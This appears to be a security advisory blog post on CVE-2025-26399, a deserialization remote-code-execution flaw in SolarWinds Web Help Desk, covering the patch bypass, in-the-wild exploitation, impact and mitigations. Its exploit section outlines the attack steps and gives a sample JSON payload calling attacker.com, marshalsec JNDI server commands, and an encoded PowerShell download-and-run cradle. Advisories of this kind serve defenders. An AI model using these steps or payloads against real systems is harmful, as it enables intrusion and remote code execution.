Listen to this Post
CVE-2025-26399 is a critical unauthenticated remote code execution vulnerability in SolarWinds Web Help Desk (WHD) stemming from insecure deserialization within the AjaxProxy component . The vulnerability is a patch bypass, meaning it evades the fixes previously applied for CVE-2024-28988, which itself was a bypass of the original flaw, CVE-2024-28986 . WHD, built on the Java WebObjects framework, uses an AjaxProxy to handle JSON-RPC requests via the jabsorb library . The core issue is the deserialization of untrusted data without proper validation . Attackers can craft a malicious serialized Java object and send it to the AjaxProxy endpoint . Earlier patches attempted to sanitize “params” and “fixups” fields in JSON payloads, but only when the request URI contained the string “ajax” . By altering the request path to remove “/ajax/”, an attacker can completely bypass this sanitization . Furthermore, a blacklist function, checkSuspeciousPayload(), can be evaded by prepending whitelisted terms (like those from isWhitelisted()) to the malicious JSON payload . This allows the attacker to trigger a JNDI lookup, ultimately leading to arbitrary code execution on the host machine with SYSTEM-level privileges, without requiring any authentication .
dailycve form:
Platform: SolarWinds Web Help Desk
Version: 12.8.7 and earlier
Vulnerability : AjaxProxy Deserialization RCE
Severity: Critical (9.8)
date: 2025-09-23
Prediction: Patch already available (12.8.7 HF1)
What Undercode Say:
Analytics:
Initial Disclosure: The vulnerability was reported by an anonymous researcher working with the Trend Micro Zero Day Initiative (ZDI) and patched by SolarWinds in September 2025 .
Attack Chain: Exploitation provides unauthenticated remote code execution, often used as an initial access vector. Post-exploitation activity observed includes deploying legitimate RMM tools (e.g., Zoho ManageEngine), establishing persistence via QEMU virtual machines for SSH backdoors, and using Cloudflare tunnels for C2 .
Threat Actor Interest: Microsoft observed attacks in December 2025 targeting vulnerable WHD instances, potentially as zero-days. CISA added CVE-2025-26399 to its Known Exploited Vulnerabilities (KEV) catalog on March 9, 2026, following reports of active exploitation by the Warlock ransomware crew .
Exploit:
Vulnerability Chain: Exploitation typically chains CVE-2025-26399 with a security control bypass (like CVE-2025-40536 in later variants) to achieve RCE .
1. Bypass CSRF validation by adding a fake parameter `?badparam=/ajax/` .
2. Create a `LoginPref` component to establish a session and extract a session ID and CSRF token .
3. Create a JSON-RPC bridge and extract the `jsonrpc_endpoint` .
4. Send a malicious JSON payload to the endpoint. The payload uses a JNDI reference to fetch and execute remote Java code, bypassing the blacklist by starting with a whitelisted term .
Example Malicious JSON Payload Structure:
{"method": "XXX", "params": ["org.springframework.context.support.ClassPathXmlApplicationContext", "http://attacker.com/ malicious.xml"], "fixups": []}
Post-Exploitation Commands (Observed in the wild): Attackers use encoded PowerShell for defense evasion .
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAYwBpAG8AdQBzAC0AcwBlAHIAdgBlAHIALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQAJwApAA==
JNDI Exploitation Server (Simplified): An attacker would host a malicious class file and an LDAP server to redirect lookups.
Start a simple HTTP server to serve malicious class python3 -m http.server 8000 Use a tool like marshalsec to start an LDAP server java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://attacker.com:8000/Exploit"
Protection from this CVE:
Patch Immediately: Apply the official hotfix (SolarWinds Web Help Desk 12.8.7 HF1) or upgrade to version 2026.1, which fully addresses this vulnerability chain .
Network Segmentation: Restrict access to the Web Help Desk interface to trusted internal networks only. Do not expose the `/helpdesk/WebObjects/` path directly to the internet .
IPS Signatures: Deploy intrusion prevention signatures to detect and block exploit attempts (e.g., SonicWall IPS signatures 21895 and 21896) .
Credential Rotation: After patching, rotate all credentials and service account passwords that were accessible from the compromised host .
Threat Hunting: Check for unauthorized RMM tools (e.g., ManageEngine, ConnectWise), unexpected QEMU processes, and connections to Cloudflare or Elastic Cloud services .
Impact:
System Compromise: Successful exploitation allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges, leading to full control of the host machine .
Lateral Movement: Once inside, attackers use the compromised WHD server as a beachhead to move laterally, steal credentials (via LSASS dumping or DCSync attacks), and compromise the wider domain .
Persistence: Attackers establish persistent backdoors using techniques like QEMU virtualization and legitimate remote monitoring and management (RMM) software, making removal difficult .
Data Exfiltration: Sensitive data, including ticket details and asset information, can be exfiltrated to attacker-controlled cloud storage (e.g., Elastic Cloud) .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

